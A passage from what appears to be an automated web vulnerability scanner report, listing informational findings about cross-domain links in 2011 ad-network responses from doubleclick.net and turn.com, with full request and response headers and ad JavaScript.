Host:   http://ad.doubleclick.net
Path:   /adj/inet.hostcat/_default

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/inet.hostcat/_default;sz=300x250;ord=6600823514768254? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 24 Apr 2011 12:24:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 12:09:39 GMT
Expires: Sun, 24 Apr 2011 12:09:39 GMT
Cache-Control: private
Content-Length: 343

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af3/0/0/%2a/j;233907841;0-0;0;20874861;4307-300/250;22858237/22876120/1;;~sscs=%3fhttp://hostvoice.com/affordable-budget-web-hosting.htm"><img src="http://s0.2mdn.net/viewad/1577894/hostvoice_300x250_030707.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

23.37. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=rTkLkqau0QYxEN8cNaNZ1540fgUNTQEFI_-TsQris_yUrlPSSsigYRzdV-ftYQYrNyl8nUEbZUM81SBCKCjJVa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ykFEGLiLwCfrF_l8MZMrUPZcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFQ1hyEc2EaR6nmDIgRgRYe5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRN3AAEYgcK5QPQHd4Gc9VYh_kTRQqV9eMU3w&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=0krt7pECH8f4AUkPMfPLxNAr0dEyNgkKmFB5H7cnjGLDlGIUOWYS4TNj-1gj_XcuxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIFsDfM2NXKITtK5mEB67uG6cnJ8KBYgKUktokmqS3LjssnDIVNl5s8p6BWhDRQOG1Y1QTmhSKBBfCiPR2XvN6a6VdA-aRZXmNDP7lSI2wQSGx5v0cV6H6qtinx1Q704l-oUMjpIXpB6il7FFbzULWw5owoppYQSGwYQ5BfDbDCXy7HaUnluhwvfAdxnu7dyaxuyYLZMG4wQKFopdYuz1yBkTjkCmowViAePMRyVPxPzlfGp9uLaSbmsFulcqR4MLdwCFGRMny4v-4Ds-xWhNSYnNvHc1u2FfaaVBP8uYfPQfqxkCNFN8XdDxnx0YUA_3_mJDs89nd4Ymqut34z12EKAQQ0XtSgyP9-pRtjKBA9CwzM3FOMa0O1QUooBe9oKQ-Zjw1q3jr96MmE73EdnErm38YriNnAPqrwti3Wg6OhdHY00Dl81uL0cu5Q6kIArODaj37arSozuBgqeZjp8etrKPwTSy9iaxr-86fHYsP3kCoKqMVJJLJFDSB1wQojnNFKkGl9xikTxa0vI9mU1SXUh8CBkO6GkBHkeKwDk3LOZRA8ZmyZijY6_JnGie9hFbVX_nt60k_c8nKVgiqmQKtbIsDf_Pg2Vk_EWg-3dTD9pFa_rO01fMzute_fYySUOw29_-4Q9nZqsY5R2PvJYgjAN0GkbFYUQAsda9MPjdcAf4vJjfmIp4TIVEpaTTrJtL8xV0D5pFleY0M_uVIjbBBIbAWMjqLBOCe9VVjMvOiSQrwRzaM85XOnnIs3YsAXTRuB0vobXYP71SE5qK-q8G4NqymsOAZ_ZZzNB9X-4LMkX7LJgtkwbjBAoWil1i7PXIGR9EM30P5U0hfSiCS3ai_9HOwiGbZycrdghgM4PLmqoFcr5JF0uF3_61PJqBYJpzzCnUhdwVsCxTJUZM0zzFL-GQQ0XtSgyP9-pRtjKBA9Cw3NA3NLeN-dqw7TfckMUrtZjw1q3jr96MmE73EdnErm3DDcSEX45GYe-BefdalTg1TcqJM5Z0esfZTBDm1i5g02j37arSozuBgqeZjp8etrKAc1Kh9i4VqWmH-WjZpleKYKqMVJJLJFDSB1wQojnNFL3x8B4wkuG2roHzuh5_jmyQ_I_YIZ3XqvyWF_ra-KXfVpWMEHqaABO2DzKH5eC2_brzVFOQNUm4X8Ov5z_xEqQSrT3g-RzCp2Y9_RlOxNr-ys9Q4Vv2M-68gmzVv1FrQ9qufQ3amnZDFmzEFsBUDI9pcq4mYGsFa2vGdUtarzDcE-2wokPkAlCyjlgMdxBJ7qB7iSDyvObI9Sl6zl5fzQq55TmIj-LLHE4_nQH38JlYn3rm--dL65XS9oD2kwF5AMIsJpQJ3PhWZ2XtnJE031cfklVSiEH91alc83RKEOLHQseC4elKYmGBtaPL3JeZkD_VRlSZ63nc8pWYmEgwvFTiVNCusU3aZUiKmlso65aOCocTugTwKeprUG3neYANAo4J6ekcOZZgLFNOzedSuY9z2Us8axPZDf7mRaLxnzkYR-jKB9Z9Zi8dlEkmb9sfPxxhEj2iEnMXn4ojzStDglBuTHZ0UJYMFG8VP9AbV8tMnfFltleNrfiBYQXvcmkhcNf7aVuC9ut9s_z1sPrN4P5RoKOi2YNHd8ZQWu6HEH7d3YBbJkXGA64A1Px9H-Ds6pJnwjklmnl59Da-S-hTRcXxXdoEcPfDHWNu_wu-UkE9xeP1juzVgZLdKkLnjgbxd10zNEI9IunejXvkjKPWUVt-Jy9hPHX1COKiv94U7eufztYpVDv6iB6ejLs3P5WtVP9jo4gDlOzxG7lpvOKXuUxKdPncB-LhhfwxBeh74YKLm6h2REpqstP7lKKO2gLjjWd12zyNpTwTtHsPf22kN4hhck2zZZRltvukjy_mM_-b9Fz5EjryO5GEnXNfQp6Ennr5ujrAVvnEH0lj-uyLApzdyd0SuxyeOwzsFIIpJAAO9pctXTi7tWZA3KABfGHhkV_5au42d9ia7oBgo1CLqjJMi6E0GGiHPbluPGXDbtnIiC7T_sitScsLL2BYqjJVfYBydhF0pZHR2D0BzPZ6gdhOx6hrcrnNzn805ZIttSJHndJeWJm9m5rR9osjbmyRrEisP86hfkI5xuPzXsWWGmFnUnScVaKAjoISxWQSp_9BEDtrwK3tthfJZ0psng3M2u2BqIFpXZGk9bucdxN-sV6zUu6PrkJPZ5feenRTNHJS734dy2QIXiLHCObftj54ePoGsTMVJDxYNjK13tk7ukWWCv3ifN7G1W2YJODJtsY74Fu_jktOcHL8hhwbCcPatQmGfiihlQ8xz5fc5c-wrpVeSFarToM8R2WlRziHRECDowm7-i7OFvu5eoWYnoeR-aXyb89P8adLvUq9zsPtJXoXsySa9pfLW8tPPgcsLr2RccjOLKJmYrucZDWUNef1OkaaPlHFfpKoHWtyP0Sulwfxvpz5mhO8B6jCUN_hJsThb383eWA9Onz1TWdS0wWTeJ4c9q2DhXMqRVdB0eEURyz; fc=6SF-YrQOlWG6b0iP2-2NsulxE4c6zsGn5TjI9kzSipVsfhME3rZv57cIF8eaDH532g9tsxB_asXrCmB8yAZFhCEVuEBWF2BJd4O6JLUjzhssvZVnwB7P1iHAZlWSX3sfJZqwGp_HFwjoMxL9MoaRMjZ3Kye3PAFmP6IoQLIRtH0LcIqy0z9VGWKwxmaKKQ8XnLbzR0hp8geuo9g-ix58aWe7XKhMRutfkMpZuWUsim-qONPAcUfbmswfIykg5y75; pf=f8YBhRYNj3H2e_gk6nfKRkFMgeWwkakQS2GmgtPhUbYIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtNe4ZHXq7leG0WnIaAM7NfPB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 16:20:45 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=wMdN3IA4Gj6r2JeEG2Scom1vMTqPvhqCchn_dwIVK3bAQoMWzzeIRUwqlX4XkpTlxEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oThAVWEvsmYmt6NIdXLN-7b0mfx30Z0m20DUYOHma1iMewwKNG6Vp-GxfVf_EykU6LfwESJ4HNhmJtjvBex-YKCc8G7vou24z--w_gke0ns7NpEEy1Y6E_EHxRfmbLZ1cWrMkfzJCRjod-12LuM3yNEMg6fMWn5Rve6KLxWq7P0IemNa-3CGw7dg2Xbxl9yyjzN5A4QuG2K_aAO-SHF7T3HhNKKp2uy6Jf_izbJ4fT1IrryLc_cS88mcNh9O05zZai8bW8edLI4EYiBeioa8Nn9qGjdQJTtjVZ9bXK_YQ_BT6XeCQtDvRN0cpJn9N6TdvW1HPNJmxjyYHWoZ-RvqO1TyAJqDG6mEyZwudlJBlLWH_ftWvK6YyvSIbYzcA4q2yx3BGIBe1qfIDTYPebZTLrCK9n04eTj2yLvG-HV9NqT6KR1gXBTdH5jry0PtoQ1AeAN4eSYVpeIfay296bMhgEJxTnotBPRoUrzcJvCV5S7_9t1sffihX5_BegTFe1GGIwYQ2KIH69otvVReKhLMDlxtBPdeqoht9ByqjYbOh33uTTXcCOkVaDDw03VkGm3uOHwv5ZQ5m2mTzLC0Rhxp-gsGmpS1vpTy7CEw_F27aSBKg9k5fXKFuqlzR-8AtKPkx7fwESJ4HNhmJtjvBex-YKDH_58BKZxUkzXkRdgeq0Ix7dQaUAsNKGmGOpY_21OII_mjcC29cWKAFZLsmzdyJY4hmtwtXYBDOzWNMpz25aDBemNa-3CGw7dg2Xbxl9yyjwlA4TuBUvX_Z-aUIXCkrqYwfqRHkdzRktg9x4ASm7mYu_2URTPQwp7prxJqmG7gw6ah56-HOIRgSSdEiojeZMNqGjdQJTtjVZ9bXK_YQ_BT4YvFPHKFvClTetIp5sFmR7qweRFW5C80-4q0k8PchIEbneS3P1jt3L2TU8DfXrAaO93Hmpqold0I45kSWFpZUdBpGxWFEALHWvTD43XAH-IISjk4v2YhwfWhYQtvWgYgVdA-aRZXmNDP7lSI2wQSGymRCuiX3msEf9Zx7_6oXdHFf3tE5HaJy7RuA2Rf6LYdaupG0mP-ALWuA6T1v3SoZ6tsowBc5pDAMyPtooX8bZ-yYLZMG4wQKFopdYuz1yBkr0NceN6dcXfCMb4qxb1ERCcJYAYD6EJQRZIEqwxwbz_yU6FIdm7osa-pnXnLvWEHNvHc1u2FfaaVBP8uYfPQfuUSZnolg2Mpi0PobZmvQDOteZNpUmAWLLBJZU75gkasQQ0XtSgyP9-pRtjKBA9Cwz2-4R9q34tPG7_LuWX_-aNjw1q3jr96MmE73EdnErm31cGBaFvfPGmIk78ZSjniU14SZgXhN6QRQnmxfn_Dr0Sj37arSozuBgqeZjp8etrKTdm0m9YtM5QtSe1bVf3R9YKqMVJJLJFDSB1wQojnNFLul7Qf_CirYJ-2QPYzq4yhsN0iuvZzF2TN72AdplWiGw8ZmyZijY6_JnGie9hFbVWeVYVArdJUjqkVsoRhZx5NsDf_Pg2Vk_EWg-3dTD9pFTjLDlon4jl8OOYYJTu_NA2U7H715d1gC9l-sZbJovak0GkbFYUQAsda9MPjdcAf4rBmUpt5y4rpKeABCF5QVHZV0D5pFleY0M_uVIjbBBIb9xT-csezj6lwXj_Nmdt2seLQXpLB6S1HBINAWF7E-PHgGmzu9XVcy87K21WiFWA7eN32Cn9-yoSfhGoimhWR97JgtkwbjBAoWil1i7PXIGRwNeiC56J41DeOs0h4Jdxf3U9yID4iMwKKBdWV0IWb4TfoQpcwAkPV_qYEXL4IsHf7dumssffcgoAlY6D2cXtVQQ0XtSgyP9-pRtjKBA9CwyrXT4Jtn4VTomBGSvjPUlhjw1q3jr96MmE73EdnErm3uasuleILtl5vfSa5So8yJ9SNrmRJCF3Pym6bROG15rEJXP1NEAEZrQLuU5tQYJdPZM1f6dELuAO8KtDRpqB5gmeMi1_n57x6YbK1sWcZupAhILP-pxiHcDJ1yFRsxk-TpsurtJYm25B4wm31tw5WHUD1RI5tHbziFyffCyec3xGAUJ346hmYbpDuUQ4oKjAiuL-2hbuln5AhIPfoFUF_EOHEnUDigVg1M2ynf_Wev9WX3kdiLElhX_nAiyZmBTfdm-XlB5QoWysyF-Y7Hf1MZXBheiAjiFf5UzegIuH4PUQO-ze74swfA11CtF02V_39E9eoWE0gjO__pRMYYCNos0id5u8voWars0ao_qpATqNv_nBNy4ucZg6Y4GMkS-Uy8QQogP__eeWKX_QyF6ZbfYlb808DY-4xpXvlG467_nOUxOanVNnn4gjMy4MXX_SYFgsT-Nyw6KA-UjtAzGx3ST26t-B9xRBN7mU2hlplarkFg1XBpthQ9HeAKEBf7kLSFRszfmYYe7Uvism5tsd-daY69ooDGZ3MpHXJdraprT7FOexOskvdKO4Nn35_FhBwTIvlSRAKdhdfTf_oLe9lSCovVmdibgj-eMxLBiVi9XaDpNlPu8OR8iP58nJcBcTfVBGx3ns03mUvCZAJm2YFEhr_SLCdfj6RZeVGuJjlpic4ukWbG8MrCkW6W1TNM51xyxUVFhCvn0Tsd2NN9Zg8CyVNSFbYT5i7EXUVsdX8VTpF6b_wTUKzPif6s4UsPRj5Xq329VWKuLUk8yR2TvuJlbPnSCsBMPzFM2TT622lUby3hrchtrkdVv94MMYvLFr_QqjhVA8noDmAMG3mRsWKcAWLEnchZRjNygyTywHm2OJOtAGVx_Q0nNelONr6KGG7VcX71eFucJce-UVDjth4kBZtDZf5aNFW5vne7J0GifHJC9Q26Zmd945oWbNmUqXPynv7-EjJb1GgH4fe1ui1I38Lrlk2aw4cliTmTdJH5kbLRf7BMVwcZSGDzwm2Qf_W4QVN6Lw-cKLO8HW5YV58k9EmBovamd8o5wXzBFcJNgrTgOkCvP7Ms3Fd5TPD_21_ejEQEJbqeXQUkzlYFcpDfg3SVkp2FuVxIrMGA3hfolqzE6cYcSZIw5Uge7dI3IPUCqdnj0RzdD__y88TuHkXTWbqfXJR9tgKEcSYsF5AX81Jta6gkfeXbpfsrmLzagraPNlNQ7J9TajAB7jF_keXq7ipPVd-EbmqZHsO7WXJvyIS0LUxtihMHYGwWwPA1JQL2IPKnquMNSJ2dSU9GU0v6gIXPR87vyMdp2dqCEd60B_1OnYdcYkjhrAnU-9dGVkZrkW95fREPDVij03vj6W4YsDRmROKtAdqTEo6ecRSen_KPX3qjSxDK7eb-eT6Hy4rJW1Y4ARYPqBC-WuBQ54IPnkbgv_bB-Nmf2BwkRnorhiE47RUKLg2hVWexVlrcySxjLiP3S7m3-9MWoRkGSwVlp3hdA59kr-DRGiUI8UincYYJ-MDe6abpHIdnYqv2T4X; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: fc=UvO6miSA7srWaSUFmeMCcpUTZjrhTTWDDAvcQFQBnA_cpLRe4bq3ReqRkOtaoYvFyHAuaTl9mF7nALiSlM6KORW1jBMsMhZGMM020wYbRBNf-jvyPTWZaxMWGxN7lkboTgByV_ewuIYjgH3E0_oqobAomfI1NdN8_rfrRwVG6-YVxzGoC7kGLIbIhejl5eSL117dg5whaFGMwxNuo3bM3cdBF4hyWWGJ3xpNV_dvAQw_F9c8z5-xQ96PvJcb-tlK; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Set-Cookie: pf=0O0Evp5LqFqqor_WKvU5V8b90v2rJtW6tPaq4hh8j0wIHKIn0aMUCJnjty0nF6sdNC5UW7w2j6p7Ica3tqyPtLMm4306x4iI_gVgxycj0XjB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 16:20:45 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 16:20:45 GMT
Content-Length: 10874


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3905.turn.com/B5269631.6;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3905.turn.com/B5269631.6;abr=!ie;sz=160x600;ord=8461559076100471709?;click=http://r.turn.com/r/tpclick/id/nXvzACZ_bXWccgsA-gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
3DAGiWqtxjr5Dx913d7TIvkCTytwexKRMKpw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=8461559076100471709?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3905.turn.com/B5269631.6;abr=!ie4;abr=!ie5;sz=160x600;ord=8461559076100471709?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.38. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

